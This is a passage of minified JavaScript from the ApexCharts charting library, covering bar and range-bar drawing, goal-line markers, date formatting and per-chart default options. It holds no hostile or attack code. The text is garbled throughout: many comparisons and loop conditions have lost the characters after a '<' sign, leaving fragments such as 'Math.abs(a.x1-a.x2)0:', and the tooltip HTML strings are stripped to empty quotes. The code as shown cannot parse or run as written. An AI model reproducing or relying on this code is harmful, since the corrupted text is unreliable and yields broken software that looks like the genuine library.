u="",c=a.x2;if(Math.abs(a.x1-a.x2)0:n[i][t]<0;d&&(o*=-1),c-=o,u=r.quadraticCurve(c+o,a.barYPosition,c+o,a.barYPosition+(d?-1*o:o))+r.line(c+o,a.barYPosition+a.barHeight-a.strokeWidth-(d?-1*o:o))+r.quadraticCurve(c+o,a.barYPosition+a.barHeight-a.strokeWidth,c,a.barYPosition+a.barHeight-a.strokeWidth)}return{pathWithRadius:u,x2:c}}var h="",p=a.y2;if(Math.abs(a.y1-a.y2)=0;o--)this.barCtx.zeroSerieses.indexOf(o)>-1&&o===this.radiusOnSeriesNumber&&(this.barCtx.radiusOnSeriesNumber-=1);for(var s=a.length-1;s>=0;s--)n.globals.collapsedSeriesIndices.indexOf(this.barCtx.radiusOnSeriesNumber)>-1&&(this.barCtx.radiusOnSeriesNumber-=1)}},{key:"getXForValue",value:function(e,a){var n=!(arguments.length>2&&void 0!==arguments[2])||arguments[2],i=n?a:null;return null!=e&&(i=a+e/this.barCtx.invertedYRatio-2*(this.barCtx.isReversed?e/this.barCtx.invertedYRatio:0)),i}},{key:"getYForValue",value:function(e,a){var n=!(arguments.length>2&&void 0!==arguments[2])||arguments[2],i=n?a:null;return null!=e&&(i=a-e/this.barCtx.yRatio[this.barCtx.yaxisIndex]+2*(this.barCtx.isReversed?e/this.barCtx.yRatio[this.barCtx.yaxisIndex]:0)),i}},{key:"getGoalValues",value:function(e,a,n,i,t){var r=this,o=this.w,s=[];return o.globals.seriesGoals[i]&&o.globals.seriesGoals[i][t]&&Array.isArray(o.globals.seriesGoals[i][t])&&o.globals.seriesGoals[i][t].forEach((function(i){var t;s.push((c(t={},e,"x"===e?r.getXForValue(i.value,a,!1):r.getYForValue(i.value,n,!1)),c(t,"attrs",i),t))})),s}},{key:"drawGoalLine",value:function(e){var a=e.barXPosition,n=e.barYPosition,i=e.goalX,t=e.goalY,r=e.barWidth,o=e.barHeight,s=new S(this.barCtx.ctx),l=s.group({className:"apexcharts-bar-goals-groups"}),u=null;return this.barCtx.isHorizontal?Array.isArray(i)&&i.forEach((function(e){var a=void 0!==e.attrs.strokeHeight?e.attrs.strokeHeight:o/2,i=n+a+o/2;u=s.drawLine(e.x,i-2*a,e.x,i,e.attrs.strokeColor?e.attrs.strokeColor:void 0,e.attrs.strokeDashArray,e.attrs.strokeWidth?e.attrs.strokeWidth:2,e.attrs.strokeLineCap),l.add(u)})):Array.isArray(t)&&t.forEach((function(e){var n=void 0!==e.attrs.strokeWidth?e.attrs.strokeWidth:r/2,i=a+n+r/2;u=s.drawLine(i-2*n,e.y,i,e.y,e.attrs.strokeColor?e.attrs.strokeColor:void 0,e.attrs.strokeDashArray,e.attrs.strokeHeight?e.attrs.strokeHeight:2,e.attrs.strokeLineCap),l.add(u)})),l}}]),e}(),_=function(){function e(a,n){s(this,e),this.ctx=a,this.w=a.w;var i=this.w;this.barOptions=i.config.plotOptions.bar,this.isHorizontal=this.barOptions.horizontal,this.strokeWidth=i.config.stroke.width,this.isNullValue=!1,this.isRangeBar=i.globals.seriesRangeBar.length&&this.isHorizontal,this.xyRatios=n,null!==this.xyRatios&&(this.xRatio=n.xRatio,this.initialXRatio=n.initialXRatio,this.yRatio=n.yRatio,this.invertedXRatio=n.invertedXRatio,this.invertedYRatio=n.invertedYRatio,this.baseLineY=n.baseLineY,this.baseLineInvertedY=n.baseLineInvertedY),this.yaxisIndex=0,this.seriesLen=0,this.barHelpers=new D(this)}return u(e,[{key:"draw",value:function(e,a){var n=this.w,i=new S(this.ctx),t=new A(this.ctx,n);e=t.getLogSeries(e),this.series=e,this.yRatio=t.getLogYRatios(this.yRatio),this.barHelpers.initVariables(e);var o=i.group({class:"apexcharts-bar-series apexcharts-plot-series"});n.config.dataLabels.enabled&&this.totalItems>this.barOptions.dataLabels.maxItems&&console.warn("WARNING: DataLabels are enabled but there are too many to display. This may cause performance issue when rendering.");for(var s=0,l=0;s0&&(this.visibleI=this.visibleI+1);var y=0,x=0;this.yRatio.length>1&&(this.yaxisIndex=g),this.isReversed=n.config.yaxis[this.yaxisIndex]&&n.config.yaxis[this.yaxisIndex].reversed;var w=this.barHelpers.initialPositions();m=w.y,y=w.barHeight,c=w.yDivision,h=w.zeroW,p=w.x,x=w.barWidth,u=w.xDivision,d=w.zeroH,this.horizontal||v.push(p+x/2);for(var M=i.group({class:"apexcharts-datalabels","data:realIndex":g}),j=i.group({class:"apexcharts-bar-goals-markers",style:"pointer-events: none"}),C=0;C0&&v.push(p+x/2),f.push(m);var z=this.barHelpers.getPathFillColor(e,s,C,g);this.renderSeries({realIndex:g,pathFill:z,j:C,i:s,pathFrom:B.pathFrom,pathTo:B.pathTo,strokeWidth:P,elSeries:b,x:p,y:m,series:e,barHeight:y,barWidth:x,elDataLabelsWrap:M,elGoalsMarkers:j,visibleSeries:this.visibleI,type:"bar"})}n.globals.seriesXvalues[g]=v,n.globals.seriesYvalues[g]=f,o.add(b)}return o}},{key:"renderSeries",value:function(e){var a=e.realIndex,n=e.pathFill,i=e.lineFill,t=e.j,r=e.i,o=e.pathFrom,s=e.pathTo,l=e.strokeWidth,u=e.elSeries,c=e.x,d=e.y,h=e.y1,p=e.y2,m=e.series,f=e.barHeight,v=e.barWidth,g=e.barYPosition,b=e.elDataLabelsWrap,k=e.elGoalsMarkers,y=e.visibleSeries,A=e.type,w=this.w,M=new S(this.ctx);i||(i=this.barOptions.distributed?w.globals.stroke.colors[t]:w.globals.stroke.colors[a]),w.config.series[r].data[t]&&w.config.series[r].data[t].strokeColor&&(i=w.config.series[r].data[t].strokeColor),this.isNullValue&&(n="none");var j=t/w.config.chart.animations.animateGradually.delay*(w.config.chart.animations.speed/w.globals.dataPoints)/2.4,C=M.renderPaths({i:r,j:t,realIndex:a,pathFrom:o,pathTo:s,stroke:i,strokeWidth:l,strokeLineCap:w.config.stroke.lineCap,fill:n,animationDelay:j,initialSpeed:w.config.chart.animations.speed,dataChangeSpeed:w.config.chart.animations.dynamicAnimation.speed,className:"apexcharts-".concat(A,"-area")});C.attr("clip-path","url(#gridRectMask".concat(w.globals.cuid,")"));var P=w.config.forecastDataPoints;P.count>0&&t>=w.globals.dataPoints-P.count&&(C.node.setAttribute("stroke-dasharray",P.dashArray),C.node.setAttribute("stroke-width",P.strokeWidth),C.node.setAttribute("fill-opacity",P.fillOpacity)),void 0!==h&&void 0!==p&&(C.attr("data-range-y1",h),C.attr("data-range-y2",p)),new x(this.ctx).setSelectionFilter(C,a,t),u.add(C);var B=new R(this).handleBarDataLabels({x:c,y:d,y1:h,y2:p,i:r,j:t,series:m,realIndex:a,barHeight:f,barWidth:v,barYPosition:g,renderedPath:C,visibleSeries:y});return null!==B&&b.add(B),u.add(b),k&&u.add(k),u}},{key:"drawBarPaths",value:function(e){var a=e.indexes,n=e.barHeight,i=e.strokeWidth,t=e.zeroW,r=e.x,o=e.y,s=e.yDivision,l=e.elSeries,u=this.w,c=a.i,d=a.j;u.globals.isXNumeric&&(o=(u.globals.seriesX[c][d]-u.globals.minX)/this.invertedXRatio-n);var h=o+n*this.visibleI;r=this.barHelpers.getXForValue(this.series[c][d],t);var p=this.barHelpers.getBarpaths({barYPosition:h,barHeight:n,x1:t,x2:r,strokeWidth:i,series:this.series,realIndex:a.realIndex,i:c,j:d,w:u});return u.globals.isXNumeric||(o+=s),this.barHelpers.barBackground({j:d,i:c,y1:h-n*this.visibleI,y2:n*this.seriesLen,elSeries:l}),{pathTo:p.pathTo,pathFrom:p.pathFrom,x:r,y:o,goalX:this.barHelpers.getGoalValues("x",t,null,c,d),barYPosition:h}}},{key:"drawColumnPaths",value:function(e){var a=e.indexes,n=e.x,i=e.y,t=e.xDivision,r=e.barWidth,o=e.zeroH,s=e.strokeWidth,l=e.elSeries,u=this.w,c=a.realIndex,d=a.i,h=a.j,p=a.bc;if(u.globals.isXNumeric){var m=c;u.globals.seriesX[c].length||(m=u.globals.maxValsInArrayIndex),n=(u.globals.seriesX[m][h]-u.globals.minX)/this.xRatio-r*this.seriesLen/2}var f=n+r*this.visibleI;i=this.barHelpers.getYForValue(this.series[d][h],o);var v=this.barHelpers.getColumnPaths({barXPosition:f,barWidth:r,y1:o,y2:i,strokeWidth:s,series:this.series,realIndex:a.realIndex,i:d,j:h,w:u});return u.globals.isXNumeric||(n+=t),this.barHelpers.barBackground({bc:p,j:h,i:d,x1:f-s/2-r*this.visibleI,x2:r*this.seriesLen+s/2,elSeries:l}),{pathTo:v.pathTo,pathFrom:v.pathFrom,x:n,y:i,goalY:this.barHelpers.getGoalValues("y",null,o,d,h),barXPosition:f}}},{key:"getPreviousPath",value:function(e,a){for(var n,i=this.w,t=0;t0&&parseInt(r.realIndex,10)===parseInt(e,10)&&void 0!==i.globals.previousPaths[t].paths[a]&&(n=i.globals.previousPaths[t].paths[a].d)}return n}}]),e}(),H=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.months31=[1,3,5,7,8,10,12],this.months30=[2,4,6,9,11],this.daysCntOfYear=[0,31,59,90,120,151,181,212,243,273,304,334]}return u(e,[{key:"isValidDate",value:function(e){return!isNaN(this.parseDate(e))}},{key:"getTimeStamp",value:function(e){return Date.parse(e)?this.w.config.xaxis.labels.datetimeUTC?new Date(new Date(e).toISOString().substr(0,25)).getTime():new Date(e).getTime():e}},{key:"getDate",value:function(e){return this.w.config.xaxis.labels.datetimeUTC?new Date(new Date(e).toUTCString()):new Date(e)}},{key:"parseDate",value:function(e){var a=Date.parse(e);if(!isNaN(a))return this.getTimeStamp(e);var n=Date.parse(e.replace(/-/g,"/").replace(/[a-z]+/gi," "));return this.getTimeStamp(n)}},{key:"parseDateWithTimezone",value:function(e){return Date.parse(e.replace(/-/g,"/").replace(/[a-z]+/gi," "))}},{key:"formatDate",value:function(e,a){var n=this.w.globals.locale,i=this.w.config.xaxis.labels.datetimeUTC,t=["\0"].concat(v(n.months)),r=["\x01"].concat(v(n.shortMonths)),o=["\x02"].concat(v(n.days)),s=["\x03"].concat(v(n.shortDays));function l(e,a){var n=e+"";for(a=a||2;n.length12?h-12:0===h?12:h;a=(a=(a=(a=a.replace(/(^|[^\\])HH+/g,"$1"+l(h))).replace(/(^|[^\\])H/g,"$1"+h)).replace(/(^|[^\\])hh+/g,"$1"+l(p))).replace(/(^|[^\\])h/g,"$1"+p);var m=i?e.getUTCMinutes():e.getMinutes();a=(a=a.replace(/(^|[^\\])mm+/g,"$1"+l(m))).replace(/(^|[^\\])m/g,"$1"+m);var f=i?e.getUTCSeconds():e.getSeconds();a=(a=a.replace(/(^|[^\\])ss+/g,"$1"+l(f))).replace(/(^|[^\\])s/g,"$1"+f);var g=i?e.getUTCMilliseconds():e.getMilliseconds();a=a.replace(/(^|[^\\])fff+/g,"$1"+l(g,3)),g=Math.round(g/10),a=a.replace(/(^|[^\\])ff/g,"$1"+l(g)),g=Math.round(g/10);var b=h<12?"AM":"PM";a=(a=(a=a.replace(/(^|[^\\])f/g,"$1"+g)).replace(/(^|[^\\])TT+/g,"$1"+b)).replace(/(^|[^\\])T/g,"$1"+b.charAt(0));var k=b.toLowerCase();a=(a=a.replace(/(^|[^\\])tt+/g,"$1"+k)).replace(/(^|[^\\])t/g,"$1"+k.charAt(0));var y=-e.getTimezoneOffset(),x=i||!y?"Z":y>0?"+":"-";if(!i){var S=(y=Math.abs(y))%60;x+=l(Math.floor(y/60))+":"+l(S)}a=a.replace(/(^|[^\\])K/g,"$1"+x);var A=(i?e.getUTCDay():e.getDay())+1;return(a=(a=(a=(a=a.replace(new RegExp(o[0],"g"),o[A])).replace(new RegExp(s[0],"g"),s[A])).replace(new RegExp(t[0],"g"),t[c])).replace(new RegExp(r[0],"g"),r[c])).replace(/\\(.)/g,"$1")}},{key:"getTimeUnitsfromTimestamp",value:function(e,a,n){var i=this.w;void 0!==i.config.xaxis.min&&(e=i.config.xaxis.min),void 0!==i.config.xaxis.max&&(a=i.config.xaxis.max);var t=this.getDate(e),r=this.getDate(a),o=this.formatDate(t,"yyyy MM dd HH mm ss fff").split(" "),s=this.formatDate(r,"yyyy MM dd HH mm ss fff").split(" ");return{minMillisecond:parseInt(o[6],10),maxMillisecond:parseInt(s[6],10),minSecond:parseInt(o[5],10),maxSecond:parseInt(s[5],10),minMinute:parseInt(o[4],10),maxMinute:parseInt(s[4],10),minHour:parseInt(o[3],10),maxHour:parseInt(s[3],10),minDate:parseInt(o[2],10),maxDate:parseInt(s[2],10),minMonth:parseInt(o[1],10)-1,maxMonth:parseInt(s[1],10)-1,minYear:parseInt(o[0],10),maxYear:parseInt(s[0],10)}}},{key:"isLeapYear",value:function(e){return e%4==0&&e%100!=0||e%400==0}},{key:"calculcateLastDaysOfMonth",value:function(e,a,n){return this.determineDaysOfMonths(e,a)-n}},{key:"determineDaysOfYear",value:function(e){var a=365;return this.isLeapYear(e)&&(a=366),a}},{key:"determineRemainingDaysOfYear",value:function(e,a,n){var i=this.daysCntOfYear[a]+n;return a>1&&this.isLeapYear()&&i++,i}},{key:"determineDaysOfMonths",value:function(e,a){var n=30;switch(e=k.monthMod(e),!0){case this.months30.indexOf(e)>-1:2===e&&(n=this.isLeapYear(a)?29:28);break;case this.months31.indexOf(e)>-1:default:n=31}return n}}]),e}(),O=function(e){d(n,_);var a=f(n);function n(){return s(this,n),a.apply(this,arguments)}return u(n,[{key:"draw",value:function(e,a){var n=this.w,i=new S(this.ctx);this.rangeBarOptions=this.w.config.plotOptions.rangeBar,this.series=e,this.seriesRangeStart=n.globals.seriesRangeStart,this.seriesRangeEnd=n.globals.seriesRangeEnd,this.barHelpers.initVariables(e);for(var t=i.group({class:"apexcharts-rangebar-series apexcharts-plot-series"}),o=0;o0&&(this.visibleI=this.visibleI+1);var f=0,v=0;this.yRatio.length>1&&(this.yaxisIndex=p);var g=this.barHelpers.initialPositions();d=g.y,u=g.zeroW,c=g.x,v=g.barWidth,s=g.xDivision,l=g.zeroH;for(var b=i.group({class:"apexcharts-datalabels","data:realIndex":p}),y=i.group({class:"apexcharts-rangebar-goals-markers",style:"pointer-events: none"}),x=0;x0}));return i=l.config.plotOptions.bar.rangeBarGroupRows?t+o*h:t+r*this.visibleI+o*h,p>-1&&!l.config.plotOptions.bar.rangeBarOverlap&&(u=l.globals.seriesRangeBar[a][p].overlaps).indexOf(c)>-1&&(i=(r=s.barHeight/u.length)*this.visibleI+o*(100-parseInt(this.barOptions.barHeight,10))/100/2+r*(this.visibleI+u.indexOf(c))+o*h),{barYPosition:i,barHeight:r}}},{key:"drawRangeColumnPaths",value:function(e){var a=e.indexes,n=e.x;e.strokeWidth;var i=e.xDivision,t=e.barWidth,r=e.zeroH,o=this.w,s=a.i,l=a.j,u=this.yRatio[this.yaxisIndex],c=a.realIndex,d=this.getRangeValue(c,l),h=Math.min(d.start,d.end),p=Math.max(d.start,d.end);o.globals.isXNumeric&&(n=(o.globals.seriesX[s][l]-o.globals.minX)/this.xRatio-t/2);var m=n+t*this.visibleI;void 0===this.series[s][l]||null===this.series[s][l]?h=r:(h=r-h/u,p=r-p/u);var f=Math.abs(p-h),v=this.barHelpers.getColumnPaths({barXPosition:m,barWidth:t,y1:h,y2:p,strokeWidth:this.strokeWidth,series:this.seriesRangeEnd,realIndex:a.realIndex,i:c,j:l,w:o});return o.globals.isXNumeric||(n+=i),{pathTo:v.pathTo,pathFrom:v.pathFrom,barHeight:f,x:n,y:p,goalY:this.barHelpers.getGoalValues("y",null,r,s,l),barXPosition:m}}},{key:"drawRangeBarPaths",value:function(e){var a=e.indexes,n=e.y,i=e.y1,t=e.y2,r=e.yDivision,o=e.barHeight,s=e.barYPosition,l=e.zeroW,u=this.w,c=l+i/this.invertedYRatio,d=l+t/this.invertedYRatio,h=Math.abs(d-c),p=this.barHelpers.getBarpaths({barYPosition:s,barHeight:o,x1:c,x2:d,strokeWidth:this.strokeWidth,series:this.seriesRangeEnd,i:a.realIndex,realIndex:a.realIndex,j:a.j,w:u});return u.globals.isXNumeric||(n+=r),{pathTo:p.pathTo,pathFrom:p.pathFrom,barWidth:h,x:d,goalX:this.barHelpers.getGoalValues("x",l,null,a.realIndex,a.j),y:n}}},{key:"getRangeValue",value:function(e,a){var n=this.w;return{start:n.globals.seriesRangeStart[e][a],end:n.globals.seriesRangeEnd[e][a]}}},{key:"getTooltipValues",value:function(e){var a=e.ctx,n=e.seriesIndex,i=e.dataPointIndex,t=e.y1,r=e.y2,o=e.w,s=o.globals.seriesRangeStart[n][i],l=o.globals.seriesRangeEnd[n][i],u=o.globals.labels[i],c=o.config.series[n].name?o.config.series[n].name:"",d=o.config.tooltip.y.formatter,h=o.config.tooltip.y.title.formatter,p={w:o,seriesIndex:n,dataPointIndex:i,start:s,end:l};"function"==typeof h&&(c=h(c,p)),Number.isFinite(t)&&Number.isFinite(r)&&(s=t,l=r,o.config.series[n].data[i].x&&(u=o.config.series[n].data[i].x+":"),"function"==typeof d&&(u=d(u,p)));var m="",f="",v=o.globals.colors[n];if(void 0===o.config.tooltip.x.formatter)if("datetime"===o.config.xaxis.type){var g=new H(a);m=g.formatDate(g.getDate(s),o.config.tooltip.x.format),f=g.formatDate(g.getDate(l),o.config.tooltip.x.format)}else m=s,f=l;else m=o.config.tooltip.x.formatter(s),f=o.config.tooltip.x.formatter(l);return{start:s,end:l,startVal:m,endVal:f,ylabel:u,color:v,seriesName:c}}},{key:"buildCustomTooltipHTML",value:function(e){return'
'+(e.seriesName||"")+'
'+e.ylabel+' '+e.start+' - '+e.end+"
"}}]),n}(),V=function(){function e(a){s(this,e),this.opts=a}return u(e,[{key:"line",value:function(){return{chart:{animations:{easing:"swing"}},dataLabels:{enabled:!1},stroke:{width:5,curve:"straight"},markers:{size:0,hover:{sizeOffset:6}},xaxis:{crosshairs:{width:1}}}}},{key:"sparkline",value:function(e){return this.opts.yaxis[0].show=!1,this.opts.yaxis[0].title.text="",this.opts.yaxis[0].axisBorder.show=!1,this.opts.yaxis[0].axisTicks.show=!1,this.opts.yaxis[0].floating=!0,k.extend(e,{grid:{show:!1,padding:{left:0,right:0,top:0,bottom:0}},legend:{show:!1},xaxis:{labels:{show:!1},tooltip:{enabled:!1},axisBorder:{show:!1},axisTicks:{show:!1}},chart:{toolbar:{show:!1},zoom:{enabled:!1}},dataLabels:{enabled:!1}})}},{key:"bar",value:function(){return{chart:{stacked:!1,animations:{easing:"swing"}},plotOptions:{bar:{dataLabels:{position:"center"}}},dataLabels:{style:{colors:["#fff"]},background:{enabled:!1}},stroke:{width:0,lineCap:"round"},fill:{opacity:.85},legend:{markers:{shape:"square",radius:2,size:8}},tooltip:{shared:!1,intersect:!0},xaxis:{tooltip:{enabled:!1},tickPlacement:"between",crosshairs:{width:"barWidth",position:"back",fill:{type:"gradient"},dropShadow:{enabled:!1},stroke:{width:0}}}}}},{key:"candlestick",value:function(){var e=this;return{stroke:{width:1,colors:["#333"]},fill:{opacity:1},dataLabels:{enabled:!1},tooltip:{shared:!0,custom:function(a){var n=a.seriesIndex,i=a.dataPointIndex,t=a.w;return e._getBoxTooltip(t,n,i,["Open","High","","Low","Close"],"candlestick")}},states:{active:{filter:{type:"none"}}},xaxis:{crosshairs:{width:1}}}}},{key:"boxPlot",value:function(){var e=this;return{chart:{animations:{dynamicAnimation:{enabled:!1}}},stroke:{width:1,colors:["#24292e"]},dataLabels:{enabled:!1},tooltip:{shared:!0,custom:function(a){var n=a.seriesIndex,i=a.dataPointIndex,t=a.w;return e._getBoxTooltip(t,n,i,["Minimum","Q1","Median","Q3","Maximum"],"boxPlot")}},markers:{size:5,strokeWidth:1,strokeColors:"#111"},xaxis:{crosshairs:{width:1}}}}},{key:"rangeBar",value:function(){return{stroke:{width:0,lineCap:"square"},plotOptions:{bar:{borderRadius:0,dataLabels:{position:"center"}}},dataLabels:{enabled:!1,formatter:function(e,a){a.ctx;var n=a.seriesIndex,i=a.dataPointIndex,t=a.w,r=t.globals.seriesRangeStart[n][i];return t.globals.seriesRangeEnd[n][i]-r},background:{enabled:!1},style:{colors:["#fff"]}},tooltip:{shared:!1,followCursor:!0,custom:function(e){return e.w.config.plotOptions&&e.w.config.plotOptions.bar&&e.w.config.plotOptions.bar.horizontal?function(e){var a=new O(e.ctx,null),n=a.getTooltipValues(e),i=n.color,t=n.seriesName,r=n.ylabel,o=n.startVal,s=n.endVal;return a.buildCustomTooltipHTML({color:i,seriesName:t,ylabel:r,start:o,end:s})}(e):function(e){var a=new O(e.ctx,null),n=a.getTooltipValues(e),i=n.color,t=n.seriesName,r=n.ylabel,o=n.start,s=n.end;return a.buildCustomTooltipHTML({color:i,seriesName:t,ylabel:r,start:o,end:s})}(e)}},xaxis:{tickPlacement:"between",tooltip:{enabled:!1},crosshairs:{stroke:{width:0}}}}}},{key:"area",value:function(){return{stroke:{width:4},fill:{type:"gradient",gradient:{inverseColors:!1,shade:"light",type:"vertical",opacityFrom:.65,opacityTo:.5,stops:[0,100,100]}},markers:{size:0,hover:{sizeOffset:6}},tooltip:{followCursor:!1}}}},{key:"brush",value:function(e){return k.extend(e,{chart:{toolbar:{autoSelected:"selection",show:!1},zoom:{enabled:!1}},dataLabels:{enabled:!1},stroke:{width:1},tooltip:{enabled:!1},xaxis:{tooltip:{enabled:!1}}})}},{key:"stacked100",value:function(e){e.dataLabels=e.dataLabels||{},e.dataLabels.formatter=e.dataLabels.formatter||void 0;var a=e.dataLabels.formatter;return e.yaxis.forEach((function(a,n){e.yaxis[n].min=0,e.yaxis[n].max=100})),"bar"===e.chart.type&&(e.dataLabels.formatter=a||function(e){return"number"==typeof e&&e?e.toFixed(0)+"%":e}),e}},{key:"convertCatToNumeric",value:function(e){return e.xaxis.convertedCatToNumeric=!0,e}},{key:"convertCatToNumericXaxis",value:function(e,a,n){e.xaxis.type="numeric",e.xaxis.labels=e.xaxis.labels||{},e.xaxis.labels.formatter=e.xaxis.labels.formatter||function(e){return k.isNumber(e)?Math.floor(e):e};var i=e.xaxis.labels.formatter,t=e.xaxis.categories&&e.xaxis.categories.length?e.xaxis.categories:e.labels;return n&&n.length&&(t=n.map((function(e){return Array.isArray(e)?e:String(e)}))),t&&t.length&&(e.xaxis.labels.formatter=function(e){return k.isNumber(e)?i(t[Math.floor(e)-1]):i(e)}),e.xaxis.categories=[],e.labels=[],e.xaxis.tickAmount=e.xaxis.tickAmount||"dataPoints",e}},{key:"bubble",value:function(){return{dataLabels:{style:{colors:["#fff"]}},tooltip:{shared:!1,intersect:!0},xaxis:{crosshairs:{width:0}},fill:{type:"solid",gradient:{shade:"light",inverse:!0,shadeIntensity:.55,opacityFrom:.4,opacityTo:.8}}}}},{key:"scatter",value:function(){return{dataLabels:{enabled:!1},tooltip:{shared:!1,intersect:!0},markers:{size:6,strokeWidth:1,hover:{sizeOffset:2}}}}},{key:"heatmap",value:function(){return{chart:{stacked:!1},fill:{opacity:1},dataLabels:{style:{colors:["#fff"]}},stroke:{colors:["#fff"]},tooltip:{followCursor:!0,marker:{show:!1},x:{show:!1}},legend:{position:"top",markers:{shape:"square",size:10,offsetY:2}},grid:{padding:{right:20}}}}},{key:"treemap",value:function(){return{chart:{zoom:{enabled:!1}},dataLabels:{style:{fontSize:14,fontWeight:600,colors:["#fff"]}},stroke:{show:!0,width:2,colors:["#fff"]},legend:{show:!1},fill:{gradient:{stops:[0,100]}},tooltip:{followCursor:!0,x:{show:!1}},grid:{padding:{left:0,right:0}},xaxis:{crosshairs:{show:!1},tooltip:{enabled:!1}}}}},{key:"pie",value:function(){return{chart:{toolbar:{show:!1}},plotOptions:{pie:{donut:{labels:{show:!1}}}},dataLabels:{formatter:function(e){return e.toFixed(1)+"%"},style:{colors:["#fff"]},background:{enabled:!1},dropShadow:{enabled:!0}},stroke:{colors:["#fff"]},fill:{opacity:1,gradient:{shade:"light",stops:[0,100]}},tooltip:{theme:"dark",fillSeriesColor:!0},legend:{position:"right"}}}},{key:"donut",value:function(){return{chart:{toolbar:{show:!1}},dataLabels:{formatter:function(e){return e.toFixed(1)+"%"},style:{colors:["#fff"]},background:{enabled:!1},dropShadow:{enabled:!0}},stroke:{colors:["#fff"]},fill:{opacity:1,gradient:{shade:"light",shadeIntensity:.35,stops:[80,100],opacityFrom:1,opacityTo:1}},tooltip:{theme:"dark",fillSeriesColor:!0},legend:{position:"right"}}}},{key:"polarArea",value:function(){return this.opts.yaxis[0].tickAmount=this.opts.yaxis[0].tickAmount?this.opts.yaxis[0].tickAmount:6,{chart:{toolbar:{show:!1}},dataLabels:{formatter:function(e){return e.toFixed(1)+"%"},enabled:!1},stroke:{show:!0,width:2},fill:{opacity:.7},tooltip:{theme:"dark",fillSeriesColor:!0},legend:{position:"right"}}}},{key:"radar",value:function(){return this.opts.yaxis[0].labels.offsetY=this.opts.yaxis[0].labels.offsetY?this.opts.yaxis[0].labels.offsetY:6,{dataLabels:{enabled:!1,style:{fontSize:"11px"}},stroke:{width:2},markers:{size:3,strokeWidth:1,strokeOpacity:1},fill:{opacity:.2},tooltip:{shared:!1,intersect:!0,followCursor:!0},grid:{show:!1},xaxis:{labels:{formatter:function(e){return e},style:{colors:["#a8a8a8"],fontSize:"11px"}},tooltip:{enabled:!1},crosshairs:{show:!1}}}}},{key:"radialBar",value:function(){return{chart:{animations:{dynamicAnimation:{enabled:!0,speed:800}},toolbar:{show:!1}},fill:{gradient:{shade:"dark",shadeIntensity:.4,inverseColors:!1,type:"diagonal2",opacityFrom:1,opacityTo:1,stops:[70,98,100]}},legend:{show:!1,position:"right"},tooltip:{enabled:!1,fillSeriesColor:!0}}}},{key:"_getBoxTooltip",value:function(e,a,n,i,t){var r=e.globals.seriesCandleO[a][n],o=e.globals.seriesCandleH[a][n],s=e.globals.seriesCandleM[a][n],l=e.globals.seriesCandleL[a][n],u=e.globals.seriesCandleC[a][n];return e.config.series[a].type&&e.config.series[a].type!==t?'
\n '.concat(e.config.series[a].name?e.config.series[a].name:"series-"+(a+1),": ").concat(e.globals.series[a][n],"\n
"):'
')+"
".concat(i[0],': ')+r+"
"+"
".concat(i[1],': ')+o+"
"+(s?"
".concat(i[2],': ')+s+"
":"")+"
".concat(i[3],': ')+l+"
"+"
".concat(i[4],': ')+u+"
"}}]),e}(),F=function(){function e(a){s(this,e),this.opts=a}return u(e,[{key:"init",value:function(e){var a=e.responsiveOverride,n=this.opts,i=new B,t=new V(n);this.chartType=n.chart.type,"histogram"===this.chartType&&(n.chart.type="bar",n=k.extend({plotOptions:{bar:{columnWidth:"99.99%"}}},n)),n=this.extendYAxis(n),n=this.extendAnnotations(n);var r=i.init(),s={};if(n&&"object"===o(n)){var l={};l=-1!==["line","area","bar","candlestick","boxPlot","rangeBar","histogram","bubble","scatter","heatmap","treemap","pie","polarArea","donut","radar","radialBar"].indexOf(n.chart.type)?t[n.chart.type]():t.line(),n.chart.brush&&n.chart.brush.enabled&&(l=t.brush(l)),n.chart.stacked&&"100%"===n.chart.stackType&&(n=t.stacked100(n)),this.checkForDarkTheme(window.Apex),this.checkForDarkTheme(n),n.xaxis=n.xaxis||window.Apex.xaxis||{},a||(n.xaxis.convertedCatToNumeric=!1),((n=this.checkForCatToNumericXAxis(this.chartType,l,n)).chart.sparkline&&n.chart.sparkline.enabled||window.Apex.chart&&window.Apex.chart.sparkline&&window.Apex.chart.sparkline.enabled)&&(l=t.sparkline(l)),s=k.extend(r,l)}var u=k.extend(s,window.Apex);return r=k.extend(u,n),this.handleUserInputErrors(r)}},{key:"checkForCatToNumericXAxis",value:function(e,a,n){var i=new V(n),t=("bar"===e||"boxPlot"===e)&&n.plotOptions&&n.plotOptions.bar&&n.plotOptions.bar.horizontal,r="pie"===e||"polarArea"===e||"donut"===e||"radar"===e||"radialBar"===e||"heatmap"===e,o="datetime"!==n.xaxis.type&&"numeric"!==n.xaxis.type,s=n.xaxis.tickPlacement?n.xaxis.tickPlacement:a.xaxis&&a.xaxis.tickPlacement;return t||r||!o||"between"===s||(n=i.convertCatToNumeric(n)),n}},{key:"extendYAxis",value:function(e,a){var n=new B;(void 0===e.yaxis||!e.yaxis||Array.isArray(e.yaxis)&&0===e.yaxis.length)&&(e.yaxis={}),e.yaxis.constructor!==Array&&window.Apex.yaxis&&window.Apex.yaxis.constructor!==Array&&(e.yaxis=k.extend(e.yaxis,window.Apex.yaxis)),e.yaxis.constructor!==Array?e.yaxis=[k.extend(n.yAxis,e.yaxis)]:e.yaxis=k.extendArray(e.yaxis,n.yAxis);var i=!1;e.yaxis.forEach((function(e){e.logarithmic&&(i=!0)}));var t=e.series;return a&&!t&&(t=a.config.series),i&&t.length!==e.yaxis.length&&t.length&&(e.yaxis=t.map((function(a,i){if(a.name||(t[i].name="series-".concat(i+1)),e.yaxis[i])return e.yaxis[i].seriesName=t[i].name,e.yaxis[i];var r=k.extend(n.yAxis,e.yaxis[0]);return r.show=!1,r}))),i&&t.length>1&&t.length!==e.yaxis.length&&console.warn("A multi-series logarithmic chart should have equal number of series and y-axes. Please make sure to equalize both."),e}},{key:"extendAnnotations",value:function(e){return void 0===e.annotations&&(e.annotations={},e.annotations.yaxis=[],e.annotations.xaxis=[],e.annotations.points=[]),e=this.extendYAxisAnnotations(e),e=this.extendXAxisAnnotations(e),this.extendPointAnnotations(e)}},{key:"extendYAxisAnnotations",value:function(e){var a=new B;return e.annotations.yaxis=k.extendArray(void 0!==e.annotations.yaxis?e.annotations.yaxis:[],a.yAxisAnnotation),e}},{key:"extendXAxisAnnotations",value:function(e){var a=new B;return e.annotations.xaxis=k.extendArray(void 0!==e.annotations.xaxis?e.annotations.xaxis:[],a.xAxisAnnotation),e}},{key:"extendPointAnnotations",value:function(e){var a=new B;return e.annotations.points=k.extendArray(void 